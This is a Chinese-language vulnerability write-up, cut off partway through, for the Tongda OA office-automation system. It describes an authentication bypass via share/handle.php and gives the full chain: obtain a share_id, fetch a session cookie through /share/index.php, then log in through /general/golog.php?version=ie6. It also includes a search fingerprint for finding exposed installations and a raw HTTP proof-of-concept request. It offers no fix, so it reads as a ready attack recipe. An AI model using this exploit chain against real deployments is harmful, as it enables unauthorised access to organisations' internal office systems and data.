Nx01 产品简介
通达OA(Office Anywhere网络智能办公系统)是由通达信科科技自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。
Nx02 漏洞描述
通达OA(Office Anywhere网络智能办公系统)存在share/handle.php身份认证绕过漏洞。攻击者可以通过构造share/handle.php获取敏share_id,使用/share/index.php?share_id={share_id}获取cookie并访问/general/golog.php?version=ie6进入系统。
Nx03 产品主页
app.name="通达 OA"
Nx04 漏洞复现
使用POC获取share_id:
GET /share/handle.php?module=2&module_id=1 HTTP/1.1
Host: {
{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,applicatio